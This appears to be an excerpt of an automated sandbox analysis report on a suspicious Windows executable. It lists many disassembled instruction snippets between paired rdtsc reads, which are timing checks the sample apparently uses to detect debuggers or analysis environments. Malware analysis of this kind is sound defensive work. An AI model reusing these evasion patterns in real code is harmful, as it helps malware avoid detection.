Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5182D1 second address: 5182E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnp 00007F5BC10B709Ch 0x0000000d jl 00007F5BC10B7096h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5182E4 second address: 5182EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5182EA second address: 5182FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 518458 second address: 518468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F5BC10A35F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 518468 second address: 51846C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 51A4EB second address: 51A4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F5BC10A35FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 51A4F8 second address: 51A4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 51A4FC second address: 51A518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3606h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 51A518 second address: 51A54B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F5BC10B70B5h 0x00000011 pushad 0x00000012 jmp 00007F5BC10B70A3h 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 51C7AC second address: 51C7B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 51FA27 second address: 51FA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5243C0 second address: 5243E8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F5BC10A35F8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F5BC10A3601h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 524559 second address: 52455D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 523B3E second address: 523B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5BC10A35F6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5BC10A3600h 0x00000012 jmp 00007F5BC10A3603h 0x00000017 popad 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 524812 second address: 524816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 524816 second address: 524826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 524826 second address: 524836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F5BC10B7096h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 524836 second address: 52483C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 52483C second address: 524845 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5249B9 second address: 5249BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5249BD second address: 5249CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5BC10B709Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 524DA9 second address: 524DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F5BC10A35F6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 527BD2 second address: 527BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 527E99 second address: 527EA3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 527EA3 second address: 527EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5BC10B7096h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 527EAF second address: 527EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 52A5AF second address: 52A5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 52A5C4 second address: 52A5CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 52A26F second address: 52A28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5BC10B70A2h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 52A28A second address: 52A29A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 52A29A second address: 52A2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F5BC10B7096h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 52E479 second address: 52E494 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BC10A35FDh 0x0000000b jl 00007F5BC10A3602h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 52EA13 second address: 52EA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 52EA19 second address: 52EA2F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5BC10A35F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jc 00007F5BC10A35F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 52EA2F second address: 52EA3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5354C3 second address: 5354F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5BC10A3600h 0x0000000b popad 0x0000000c push ecx 0x0000000d ja 00007F5BC10A35F6h 0x00000013 jns 00007F5BC10A35F6h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F5BC10A35F6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5354F2 second address: 5354F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 533E33 second address: 533E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5BC10A35F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 533E3D second address: 533E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 533E41 second address: 533E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F5BC10A35F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 533E4F second address: 533E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 533E53 second address: 533E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 533FA0 second address: 533FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 533FA4 second address: 533FB8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5BC10A35F6h 0x00000008 jnp 00007F5BC10A35F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5341FA second address: 5341FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5341FE second address: 53420E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5BC10A35F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 53420E second address: 534212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 534363 second address: 534380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3604h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 534380 second address: 534386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 534386 second address: 53438C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E822D second address: 4E8239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F5BC10B7096h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E8362 second address: 4E83B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F5BC10A3607h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F5BC10A35F6h 0x00000014 popad 0x00000015 popad 0x00000016 nop 0x00000017 pushad 0x00000018 mov dword ptr [ebp+12474C7Ah], eax 0x0000001e mov dword ptr [ebp+122D54C2h], eax 0x00000024 popad 0x00000025 push 0000001Eh 0x00000027 mov dword ptr [ebp+122D288Fh], ecx 0x0000002d sub dword ptr [ebp+1247BFE9h], ebx 0x00000033 nop 0x00000034 jp 00007F5BC10A3600h 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 534665 second address: 534669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 534669 second address: 53466F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 537BB5 second address: 537BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 537BBB second address: 537BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 53ECB7 second address: 53ECBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 53ECBB second address: 53ECBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 53F244 second address: 53F25A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 53F25A second address: 53F263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 53FA96 second address: 53FAAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10B70A0h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 53FAAF second address: 53FADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5BC10A3603h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F5BC10A360Ah 0x00000012 jmp 00007F5BC10A35FCh 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 54364A second address: 54364E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 54364E second address: 543652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 543A3F second address: 543A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A0h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F5BC10B7096h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 543A61 second address: 543A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 543A65 second address: 543A9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A6h 0x00000007 jmp 00007F5BC10B70A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnc 00007F5BC10B709Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 545AF6 second address: 545AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 545AFC second address: 545B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 54BBCB second address: 54BBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 54BBCF second address: 54BBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 55680B second address: 55680F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 55680F second address: 55681D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10B7096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 55681D second address: 556823 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 554A4A second address: 554A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 554A4E second address: 554A74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F5BC10A35FCh 0x0000000c jnp 00007F5BC10A35F6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5BC10A35FDh 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 554A74 second address: 554A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 554A78 second address: 554A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BC10A3600h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 554A8E second address: 554A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 554A95 second address: 554ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10A35FDh 0x00000009 popad 0x0000000a jp 00007F5BC10A3608h 0x00000010 jmp 00007F5BC10A35FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 554D35 second address: 554D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 554EC0 second address: 554ECE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 554ECE second address: 554ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 55518E second address: 5551A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5BC10A35FEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5551A4 second address: 5551B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5551B4 second address: 5551C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jno 00007F5BC10A35F6h 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5551C8 second address: 5551FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5BC10B70A3h 0x0000000a pushad 0x0000000b jmp 00007F5BC10B709Ch 0x00000010 jmp 00007F5BC10B709Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 55533D second address: 555368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10A3601h 0x00000008 jmp 00007F5BC10A35FDh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 555368 second address: 55536E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 555639 second address: 555643 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 555643 second address: 555647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 555773 second address: 555777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 555777 second address: 5557A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B709Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F5BC10B709Ch 0x00000011 jno 00007F5BC10B7096h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F5BC10B709Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5557A8 second address: 5557AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5557AC second address: 5557B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
